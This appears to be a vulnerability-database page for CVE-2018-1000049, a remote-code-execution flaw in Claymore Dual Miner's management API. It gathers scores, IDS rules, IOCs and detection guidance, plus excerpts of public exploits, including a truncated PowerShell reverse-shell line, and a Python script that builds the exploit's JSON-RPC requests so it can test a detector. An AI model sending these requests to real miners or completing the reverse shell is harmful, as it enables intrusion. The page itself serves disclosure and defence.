CVE-2018-1000049
Published: 2018-02-09
Severity: high, CVSS 3.0 base score 7.5 (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)
Priority: P183
Exploitation: exploited in the wild (ITW exploit, listed in VulnCheck KEV)
EPSS: 77.30% (99.5th percentile)
Nanopool Claymore Dual Miner version 7.3 and earlier contains a remote code execution vulnerability by abusing the miner API. The flaw can be exploited only if the software is executed with read/write mode enabled.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nanopool | claymore_dual_miner | <= 7.3 | — |
Detection & IOCs (extracted from sources)
bytes: 706f7765727368656c6c2e657865 (decodes to "powershell.exe")
bytes: 5c5c7837665c5c7834355c5c7834635c5c783436 (decodes to the text "\\x7f\\x45\\x4c\\x46", the ELF magic bytes in backslash-escaped form)
snort
alert tcp $EXTERNAL_NET any -> $HOME_NET 3333 (msg:"ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows"; flow:established,to_server; content:"jsonrpc"; content:"method"; content:"miner_file"; content:".bat"; content:"706f7765727368656c6c2e657865"; fast_pattern; reference:url,exploit-db.com/exploits/45044/; reference:cve,2018-1000049; classtype:attempted-user; sid:2025862; rev:2;)
snort
alert tcp $EXTERNAL_NET any -> $HOME_NET 3333 (msg:"ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux"; flow:established,to_server; content:"jsonrpc"; content:"method"; content:"miner_file"; content:".bash"; content:"5c5c7837665c5c7834355c5c7834635c5c783436"; fast_pattern; reference:url,exploit-db.com/exploits/45044/; reference:cve,2018-1000049; classtype:attempted-user; sid:2025861; rev:1;)
- Detect exploit stage 1 (file write): monitor TCP port 3333 for JSON-RPC requests whose method is 'miner_file' with 'reboot.bat' (Windows) or 'reboot.bash'/'reboot.sh' (Linux) as the first parameter, followed by a hex-encoded payload string.
- Detect exploit stage 2 (trigger): monitor TCP port 3333 for JSON-RPC requests whose method is 'miner_reboot', which makes the miner execute the previously written reboot script.
- The Windows payload hex signature '706f7765727368656c6c2e657865' decodes to 'powershell.exe'; use it as a fast-pattern content match within miner_file traffic on port 3333.
- The Linux payload hex signature '5c5c7837665c5c7834355c5c7834635c5c783436' decodes to the text '\\x7f\\x45\\x4c\\x46', the ELF magic bytes in backslash-escaped form as they appear in the hex-encoded reboot.bash payload.
- The reconnaissance step uses the 'miner_getfile' method to retrieve 'config.txt' and fingerprint the target OS before exploitation; alert on this API call as a precursor indicator.
- The vulnerability is only exploitable when the miner is started with read/write mode enabled; read-only API mode is not affected.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.0 | MEDIUM | AV:N/AC:M/Au:S/C:P/I:P/A:P |
| VulnCheck | — | 7.5 | HIGH | — |
GHSA
GHSA-mg4j-hgc5-ggv5: Nanopool Claymore Dual Miner version 7
ghsa_unreviewed · 2022-05-13 · HIGH · CWE-20 · CVE-2018-1000049
Nanopool Claymore Dual Miner version 7.3 and earlier contains a remote code execution vulnerability by abusing the miner API. The flaw can be exploited only if the software is executed with read/write mode enabled.
VulnCheck
nanopool claymore_dual_miner Improper Input Validation
vulncheck · 2018 · CVSS 7.5 · HIGH · CVE-2018-1000049
Nanopool Claymore Dual Miner version 7.3 and earlier contains a remote code execution vulnerability by abusing the miner API. The flaw can be exploited only if the software is executed with read/write mode enabled.
Affected: nanopool claymore_dual_miner
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/Insecure+Claymore+Miner+Management+API+Exploited+in+the+Wild/23665
Suricata
ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows
suricata · 2018-07-17 · CVE-2018-1000049
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3333 (msg:"ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows"; flow:established,to_server; content:"jsonrpc"; content:"method"; content:"miner_file"; content:".bat"; content:"706f7765727368656c6c2e657865"; fast_pattern; reference:url,exploit-db.com/exploits/45044/; reference:cve,2018-1000049; classtype:attempted-user; sid:2025862; rev:2; metadata:attack_target Server, created_at 2018_07_17, cve CVE_2018_100004, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2019_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux
suricata · 2018-07-17 · CVE-2018-1000049
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3333 (msg:"ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux"; flow:established,to_server; content:"jsonrpc"; content:"method"; content:"miner_file"; content:".bash"; content:"5c5c7837665c5c7834355c5c7834635c5c783436"; fast_pattern; reference:url,exploit-db.com/exploits/45044/; reference:cve,2018-1000049; classtype:attempted-user; sid:2025861; rev:1; metadata:attack_target Server, created_at 2018_07_17, cve CVE_2018_100004, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2019_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Exploit-DB
Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)
exploitdb · 2018-07-17 · CVE-2018-1000049
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Nanopool Claymore Dual Miner APIs RCE',
      'Description' => %q{
        This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
      },
      'Author'      =>
        [
          'reversebrain@snado', # Vulnerability reporter
          'phra@snado'          # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['EDB', '44638'],
          ['CVE', '2018-1000049'],
          ['URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/']
        ],
      'Platform'    => ['win', 'linux'],
      'Targets'     =>
        [
          [ 'Automatic Target', { 'auto' => tru
```
Exploit-DB
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
exploitdb · 2018-05-17 · CVE-2018-1000049
---
# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
# Date: 2018/02/09
# Exploit Author: ReverseBrain
# Vendor Homepage: https://nanopool.org/
# Software Link: https://github.com/nanopool/Claymore-Dual-Miner
# Version: 7.3 and later
# Tested on: Windows, Linux
# CVE : 2018-1000049
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
```powershell
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Leng
```
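The request chain that the Exploit-DB text above starts to describe (hex-encode a script, write it with miner_file, trigger it with miner_reboot) and the staged detection the IOC bullets lay out, as one added example. This is not code from this page, from Exploit-DB 44638 or from the Metasploit module; it is written in Python so the detection logic reads more plainly than in a Snort rule. The request shape (`id`, `jsonrpc`, `method`, `params`, one JSON object per line) is assumed from the public write-ups, and the IP addresses and script bodies are constructed for the demonstration.

```python
"""Added example (not from this page, Exploit-DB 44638 or the Metasploit module):
builds the JSON-RPC requests the public exploit chain sends to the Claymore
management port and runs a detector over them that mirrors the ET rules and the
detection bullets.  All traffic is constructed inline; no miner is contacted."""
import binascii
import json
from collections import defaultdict

MGMT_PORT = 3333  # Claymore remote-manager port the ET rules watch
REBOOT_SCRIPTS = {"reboot.bat", "reboot.bash", "reboot.sh"}  # names from the detection bullets
# The page's two hex IOCs, decoded: "powershell.exe" (Windows .bat) and the
# backslash-escaped ELF magic "\\x7f\\x45\\x4c\\x46" the Linux .bash carries.
PAYLOAD_IOCS = {
    "706f7765727368656c6c2e657865": "powershell.exe",
    "5c5c7837665c5c7834355c5c7834635c5c783436": "escaped ELF magic \\x7f\\x45\\x4c\\x46",
}


def rpc(method, params=None, req_id=0):
    """One Claymore JSON-RPC request as newline-delimited JSON.  Request shape is
    assumed from the public write-ups; a -mpsw password would add a "psw" field."""
    msg = {"id": req_id, "jsonrpc": "2.0", "method": method}
    if params is not None:
        msg["params"] = params
    return json.dumps(msg)


def exploit_chain(script_name, script_body):
    """The three requests the write-ups describe, returned as raw lines."""
    hex_body = binascii.hexlify(script_body.encode()).decode()
    return [
        rpc("miner_getfile", ["config.txt"]),       # recon: read config.txt to tell Windows from Linux
        rpc("miner_file", [script_name, hex_body]),  # stage 1: write reboot.bat / reboot.bash
        rpc("miner_reboot"),                          # stage 2: the miner restarts and runs it
    ]


def inspect_request(line, dst_port=MGMT_PORT):
    """Classify one request: (stage, detail), or None when out of scope."""
    if dst_port != MGMT_PORT:
        return None
    try:
        msg = json.loads(line)
    except ValueError:
        return None
    if not isinstance(msg, dict):
        return None
    method, params = msg.get("method"), msg.get("params")
    params = params if isinstance(params, list) else []
    if method == "miner_getfile" and params[:1] == ["config.txt"]:
        return ("recon", "config.txt requested via miner_getfile")
    if method == "miner_file" and len(params) >= 2 and isinstance(params[1], str):
        name, body = str(params[0]), params[1].lower()  # hex digits may arrive in either case
        if name.lower() not in REBOOT_SCRIPTS:
            return ("file_write", f"{name} written via miner_file")
        hits = [label for ioc, label in PAYLOAD_IOCS.items() if ioc in body]
        try:
            head = binascii.unhexlify(body).decode("latin-1")[:32]
        except (binascii.Error, ValueError):
            head = "<not hex>"
        return ("stage1", f"{name} written; IOCs={hits or 'none'}; starts with {head!r}")
    if method == "miner_reboot":
        return ("stage2", "miner_reboot would execute the written reboot script")
    return None


def correlate(flows):
    """flows: iterable of (src_ip, dst_port, request_line) -> verdict per source.
    Escalates only when the write (stage 1) and the trigger (stage 2) both appear."""
    seen = defaultdict(set)
    for src, port, line in flows:
        stages = seen[src]  # registers the source even when nothing matches
        hit = inspect_request(line, port)
        if hit:
            stages.add(hit[0])
    verdicts = {}
    for src, stages in seen.items():
        if {"stage1", "stage2"} <= stages:
            verdicts[src] = "RCE chain complete"
        elif "stage1" in stages:
            verdicts[src] = "reboot script written, trigger not seen"
        elif "recon" in stages:
            verdicts[src] = "recon only"
        else:
            verdicts[src] = "no indicators"
    return verdicts


def demo():
    """Constructed traffic: a Windows chain, a Linux chain, a plain stats poll,
    and the Windows write replayed to a non-management port (IPs are made up)."""
    win = exploit_chain("reboot.bat", 'powershell.exe -Command "Start-Sleep 1"')
    lin = exploit_chain("reboot.bash", r"printf '\\x7f\\x45\\x4c\\x46' > /tmp/x")  # carries the ET Linux IOC text
    flows = [("10.0.0.5", MGMT_PORT, line) for line in win]
    flows += [("10.0.0.9", MGMT_PORT, line) for line in lin]
    flows += [("10.0.0.2", MGMT_PORT, rpc("miner_getstat1"))]
    flows += [("10.0.0.7", 8080, win[1])]
    return correlate(flows)


if __name__ == "__main__":
    for src, verdict in demo().items():
        print(src, verdict)
```

Two points worth keeping in mind when turning this into production detection. The ET rules' `content` matches carry no `nocase`, so the hex literals are case-sensitive: if the miner accepts uppercase hex digits, the same payload re-encoded as `706F77...` would slip past the rules, which is why the decoder above lowercases before matching and also shows the first bytes of the decoded script for the analyst. And the real fix is configuration, not signatures: Claymore's own readme documents that a negative port value on the `-mport` switch (for example `-mport -3333`) selects read-only mode and a positive one enables the read/write management API that this chain needs, so that switch is the first thing to check on any miner still in service.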
Metasploit
Nanopool Claymore Dual Miner APIs RCE
metasploit · exploit/multi/misc/claymore_dual_miner_remote_manager_rce
This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
Securelist
New trends in the world of IoT threats
blogs_securelist · 2018-09-18
Authors: Mikhail Kuzin, Yaroslav Shmelev, Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypot
References
- http://packetstormsecurity.com/files/147678/Nanopool-Claymore-Dual-Miner-7.3-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/148578/Nanopool-Claymore-Dual-Miner-APIs-Remote-Code-Execution.html
- http://www.rapid7.com/db/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce
- https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2018/1000xxx/CVE-2018-1000049.json
- https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/
- https://twitter.com/ReverseBrain/status/951850534985662464
- https://www.exploit-db.com/exploits/44638/
- https://www.exploit-db.com/exploits/45044/